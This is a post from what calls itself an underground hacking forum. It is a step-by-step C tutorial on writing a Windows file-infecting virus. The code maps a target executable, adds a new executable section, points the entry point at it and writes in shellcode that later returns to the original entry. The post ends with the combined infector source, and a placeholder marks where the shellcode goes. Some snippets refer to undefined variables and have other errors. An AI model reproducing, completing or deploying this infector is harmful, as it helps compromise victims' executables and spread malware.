HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Hacking Windows Virus Writing

S

sisu

Initiate
User
Joined
Oct 22, 2024
Messages
49
Reputation
0
Reaction score
84
Points
18
Credits
74
‎9 Months of Service‎
98%
Computer viruses was for a long term the most spread malware and still now days can used but not for the same purpose

so how computer viruses for windows written.
our logic is creating a new section to inject our shellcode into, then we should change the entrypoint to the entry of our code,so simple.
there is other techniques but this are the easiest.
*we will use c*
firstly we read the file into the memory use CreateFileMappingA:

Code: 
#include <stdio.h>
#include <windows.h>
int main(char *argv[],int argc){
    char* path = {0};//path of the target pe
    HANDLE hFile = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    BYTE* pMappedFile = (BYTE*)MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    if (pMappedFile == NULL) {
        printf("Error mapping file");
        CloseHandle(hMapping);
        CloseHandle(hFile);
}

then in the second part we need to create a new section and update the NT header information...
before we go to code we need to understand:
NT Header include many important information about the PE(Portable Excutable)
Section Header include include information about the sections

Code: 
  PIMAGE_DOS_HEADER DosHd = (PIMAGE_DOS_HEADER)pMappedFile;//PE Dos Header
    PIMAGE_NT_HEADERS NtHd = (PIMAGE_NT_HEADERS)(pMappedFile + pDosHeader->e_lfanew);//Nt Header
    PIMAGE_SECTION_HEADER SecNt = IMAGE_FIRST_SECTION(NtHd);//Section Header
    PIMAGE_SECTION_HEADER Newsec = &secNt[pNtHeaders->FileHeader.NumberOfSections];//our new section
    memset( Newsec , 0, sizeof(IMAGE_SECTION_HEADER));
    
    #define NAMESEC ".infsec"//name of our section
    #define SECTION_SIZE 0x1000// our section is 4kb
     strcpy((char*) Newsec ->Name, SECTION_NAME);//naming our section into the pe'

Code: 
//now all thats is updating the nt header
    DWORD sectionAlignment = NtHd ->OptionalHeader.SectionAlignment;
    Newsec ->VirtualAddress = ( NtHd ->OptionalHeader.SizeOfImage + sectionAlignment - 1) & ~(sectionAlignment - 1);
    Newsec ->Misc.VirtualSize = SECTION_SIZE;//give our section a size = 4kb
  
   //calculating multuple information in nt header
    DWORD fileAlignment = NtHd ->OptionalHeader.FileAlignment;
    DWORD rawDataPointer = SetFilePointer(hFile, 0, NULL, FILE_END);
    Newsec ->PointerToRawData = (rawDataPointer + fileAlignment - 1) & ~(fileAlignment - 1);//calculating PointerToRawData
    Newsec ->SizeOfRawData = (SECTION_SIZE + fileAlignment - 1) & ~(fileAlignment - 1);
    Newsec ->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;//changing the permission of our section

now we updating the entry point

Code: 
 NtHd ->OptionalHeader.AddressOfEntryPoint = Newsec ->VirtualAddress;//our new entrypoint is the virtual address of our new section

updating NT header again

Code: 
  NtHd->FileHeader.NumberOfSections++ ;//add 1 to number of sections
    NtHd->OptionalHeader.SizeOfImage = Newsec ->VirtualAddress + Newsec ->Misc.VirtualSize;//updating the sizeofimage

in the last part we need to copy our shellcode into the file

Code: 
 SetFilePointer(hFile, Newsec->PointerToRawData, NULL, FILE_BEGIN);// preparing to write into the file
      BYTE sec[SECTION_SIZE]= "\xFF\xFF";/here write ur shellcode ur shellcode should jump into the old entry point again   
      DWORD bytesWritten;
      WriteFile(hFile, sec, sizeof(sec), &bytesWritten, NULL);//writing our shellcode into the new section

after we combine all these code again to gother:

Code: 
#include <stdio.h>
#include <windows.h>
#define NAMESEC ".infsec"//name of our section
#define SECTION_SIZE 0x1000// our section is 4kb
BYTE sec[SECTION_SIZE]= "\xFF\xFF";//here write ur shellcode ur shellcode should jump into the old entry point again
int main(char *argv[],int argc){
    char* path = "target//pe";
    HANDLE hFile = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    BYTE* pMappedFile = (BYTE*)MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    if (pMappedFile == NULL) {
    printf("Error mapping file");
    CloseHandle(hMapping);
    CloseHandle(hFile);
}
    PIMAGE_DOS_HEADER DosHd = (PIMAGE_DOS_HEADER)pMappedFile;//PE Dos Header
    PIMAGE_NT_HEADERS NtHd = (PIMAGE_NT_HEADERS)(pMappedFile + DosHd->e_lfanew);//Nt Header
    PIMAGE_SECTION_HEADER SecNt = IMAGE_FIRST_SECTION(NtHd);//Section Header
    PIMAGE_SECTION_HEADER Newsec = &SecNt[NtHd->FileHeader.NumberOfSections];//our new section
    memset( Newsec , 0, sizeof(IMAGE_SECTION_HEADER));
    strcpy((char*) Newsec ->Name, NAMESEC);//naming our section into the pe'
    DWORD sectionAlignment = NtHd ->OptionalHeader.SectionAlignment;
    Newsec ->VirtualAddress = ( NtHd ->OptionalHeader.SizeOfImage + sectionAlignment - 1) & ~(sectionAlignment - 1);
    Newsec ->Misc.VirtualSize = SECTION_SIZE;//give our section a size = 4kb
    //calculating multuple information in nt header
    DWORD fileAlignment = NtHd ->OptionalHeader.FileAlignment;
    DWORD rawDataPointer = SetFilePointer(hFile, 0, NULL, FILE_END);
    Newsec ->PointerToRawData = (rawDataPointer + fileAlignment - 1) & ~(fileAlignment - 1);//calculating PointerToRawData
    Newsec ->SizeOfRawData = (SECTION_SIZE + fileAlignment - 1) & ~(fileAlignment - 1);
    Newsec ->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;//changing the permission of our section
    NtHd ->OptionalHeader.AddressOfEntryPoint = Newsec ->VirtualAddress;//our new entrypoint is the virtual address of our new section
    NtHd->FileHeader.NumberOfSections++ ;//add 1 to number of sections
    NtHd->OptionalHeader.SizeOfImage = Newsec ->VirtualAddress + Newsec ->Misc.VirtualSize;//updating the sizeofimage
    SetFilePointer(hFile, Newsec->PointerToRawData, NULL, FILE_BEGIN);// preparing to write into the file
    DWORD bytesWritten;
    WriteFile(hFile, sec, sizeof(sec), &bytesWritten, NULL);//writing our shellcode into the new section
    UnmapViewOfFile(pMappedFile);
    CloseHandle(hMapping);
    CloseHandle(hFile);
    return 0;
}
 
You must log in or register to reply here.
Back
Top